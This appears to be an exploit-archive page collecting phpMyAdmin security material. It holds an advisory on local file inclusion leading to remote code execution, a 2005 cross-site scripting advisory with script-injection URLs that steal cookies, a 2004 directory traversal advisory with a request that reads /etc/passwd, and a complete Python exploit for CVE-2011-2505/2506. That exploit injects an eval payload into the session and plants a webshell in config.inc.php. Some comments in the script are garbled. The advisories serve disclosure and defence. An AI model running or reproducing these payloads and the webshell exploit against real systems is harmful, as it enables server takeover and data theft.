1297 $transformfunction_name = str_replace('.inc.php', '', $GLOBALS['mime_map'][$meta->name]['transformation']);
1298
1299 require_once './libraries/transformations/' . $include_file;
This fourth vulnerability is a directory traversal in a call to require_once which can be exploited as a local file inclusion. The variable $GLOBALS['mime_map'][$meta->name]['transformation'] is derived from user input. For example, by setting $GLOBALS['mime_map'][$meta->name]['transformation'] to "../../../../../../etc/passwd" the local passwd-file could show up.
This vulnerability can only be reached if we're authenticated and requires that the transformation feature is setup correctly in phpMyAdmin's configuration storage. However, the $GLOBALS['cfgRelation'] array is derived from the $_SESSION array. Hence the variable $GLOBALS['cfgRelation']['mimework'] used to check this can be modified using the first vulnerability.
File: libraries/display_tbl.lib.php
Lines: 707-710
707 if ($GLOBALS['cfgRelation']['commwork'] && $GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'] && ! $_SESSION['tmp_user_values']['hide_transformation']) {
708 require_once './libraries/transformations.lib.php';
709 $GLOBALS['mime_map'] = PMA_getMIME($db, $table);
710 }
And the fact that $GLOBALS['mime_map'] is conditionally initialized together with the fact that phpMyAdmin registers all request variables in the global namespace (blacklists some, but not mime_map) allows us to set $GLOBALS['mime_map'][$meta->name]['transformation'] to whatever we want, even when the transformation feature is not setup correctly.
Summary
If the config folder is left in place, phpMyAdmin is vulnerable.
If an attacker has access to database credentials and the Suhosin patch is not installed, phpMyAdmin is vulnerable.
If an attacker has access to database credentials and knows how to exploit a local file inclution, phpMyAdmin is vulnerable.
phpMyAdmin version 3.x suffers from multiple remote code execution vulnerabilities.
Oriol Torrent Santiago/phpMyAdmin262XSS.txt ( na)
========================================================== Title: phpMyAdmin Cross-site Scripting Vulnerability Application: phpMyAdmin Vendor: http://www.phpmyadmin.net Vulnerable Versions: <=2.6.2-beta1 Corrected: phpMyAdmin versions after 2.6.2-beta1 Bug: Cross-site Scripting Date: 3-Apr-2005 Author: Oriol Torrent Santiago < oriol.torrent@gmail.com > References: http://www.arrelnet.com/advisories/adv20050403.html http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-3 ========================================================== 1) Background ----------- phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges,export data into various formats and is available in 47 languages. 2) Problem description -------------------- phpMyAdmin <=2.6.2-beta1 contain a vulnerability is caused due to missing validation of input supplied to "convcharset" variable. This can be exploited to execute arbitrary HTML and script code(JavaScript, VBScript,etc.) in a user's browser session in context of a vulnerable site. It allows an attacker to use the vulnerability to compromise the phpMyAdmin account, cookie theft, etc. Ex1: http://host/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><script>alert(document.cookie)</script> Ex2: http://host/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1> 3) Solution: --------- Vendor was contacted on the 29th of March 2005 and new version is released Download the latest version of phpMyAdmin 4) Timeline -------- 29/03/2005 Bug discovered 29/03/2005 Vendor notified 29/03/2005 Vendor response and bug fixed 03/04/2005 New version released 03/04/2005 Advisory released
phpMyAdmin versions 2.6.2-beta1 and below are susceptible to cross site scripting attacks.
wofeiwo/phpMyAdmin3 Remote Code Execution ( na)
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. "config" directory must created&writeable in pma directory.
# 2. session.auto_start = 1 in php.ini configuration.
import os,sys,urllib2,re
def usage(program):
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
print "Usage: %s <PMA_url>" % program
print "Example: %s http://www.test.com/phpMyAdmin" % program
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
if args[1][-1] == "/":
args[1] = args[1][:-1]
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
print "[+] Trying get form token&session_id.."
content = urllib2.urlopen(args[1]+"/index.php").read()
r1 = re.findall("token=(\w{32})", content)
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
if not r1:
r1 = re.findall("token\" value=\"(\w{32})\"", content)
if not r2:
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
if len(r1) < 1 or len(r2) < 1:
print "[-] Cannot find form token and session id...exit."
sys.exit(-1)
token = r1[0]
sessionid = r2[0]
print "[+] Token: %s , SessionID: %s" % (token, sessionid)
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
print "[+] Trying to insert payload in $_SESSION.."
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
url = args[1]+uri
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
urllib2.install_opener(opener)
urllib2.urlopen(url)
# ����setup��ȡshell
print "[+] Trying get webshell.."
postdata =
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
% (sessionid, token)
url = args[1]+"/setup/config.php"
# print "[+]Postdata: %s" % postdata
urllib2.urlopen(url, postdata)
print "[+] All done, pray for your lucky!"
# ���IJ����������shell
url = args[1]+"/config/config.inc.php"
opener.addheaders.append(('Code', 'phpinfo();'))
urllib2.install_opener(opener)
print "[+] Trying connect shell: %s" % url
result = re.findall("System \</td\>\<td
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
if len(result) == 1:
print "[+] Lucky u! System info: %s" % result[0]
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
else:
print "[-] Cannot get webshell."
except Exception, e:
print e
if __name__ == "__main__" : main(sys.argv)
Remote code execution exploit for phpMyAdmin versions below 3.3.10.2 and 3.4.3.1.
Cedric Cochin/phpMyAdmin255pl1.txt ( na)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
################################################################################
Summary :
phpMyAdmin is a tool written in PHP intended to handle the administration of
MySQL over the WWW. There is a vulnerability in the current stable version of
phpMyAdmin that allows an attacker to retrieve arbitrary files from the
webserver with privileges of the webserver..
################################################################################
Details :
The export PHP script can be exploited to disclose arbitrary file using a
include() PHP call.
Vulnerable Systems:
* phpMyAdmin 2.5.5-pl1 and prior
Release Date :
February 2, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - Arbitrary File Disclosure
(HIGH Risk)
File impacted : export.php
14:// What type of export are we doing?
15:if ($what == 'excel') {
16: $type = 'csv';
17:} else {
18: $type = $what;
19:}
20:
21:/**
22: * Defines the url to return to in case of error in a sql statement
23: */
24:require('./libraries/export/' . $type . '.php');
Exploit example:
- -- HTTP Request --
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
- -- HTTP Request --
The vulnerability is available evenif PHP register_globals is set to off.
################################################################################
Vendor Status :
The information has been provided to the phpMyAdmin Project Managers.
A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
- --> http://www.phpmyadmin.net/home_page/
- --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
< cco@netvigilance.com >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
ekO25itz2ssIvwgf2WRb/4k=
=Yuh1
-----END PGP SIGNATURE-----
phpMyAdmin versions 2.5.5-pl1 and below do not properly sanitize variables resulting in them being susceptible to a directory traversal attack.